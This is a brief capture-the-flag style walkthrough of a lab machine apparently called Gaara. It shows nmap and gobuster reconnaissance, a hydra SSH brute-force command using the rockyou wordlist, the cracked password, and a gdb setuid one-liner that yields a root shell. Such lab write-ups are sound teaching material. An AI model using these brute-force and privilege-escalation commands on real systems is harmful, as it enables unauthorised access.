Machine IP →
Nmap scan →
nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.208.142
OS Detection →
OS: Linux; CPE: cpe:/o:linux:linux_kernel
|Port||Service||Other details (if any)|
|22||SSH||OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)|
|80||HTTP||Apache httpd 2.4.38 ((Debian))|
GoBuster scan →
gobuster dir -u http://192.168.208.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
This did not reveal any useful information.
Using the image on the webpage as a reference, the username could be
gaara. Therefore, used hydra to brute force the ssh server against the rockyou password list.
hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.208.142:22
This gives the password as
iloveyou2 and subsequently gets the user flag.
Checking for setuid binaries reveals the presence of
gdb as a setuid to root executable. The user is not present in the sudoers file. Therefore, it is essential to escalate using the
This is done as follows →
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit.
This grants the root shell and subsequently the root flag.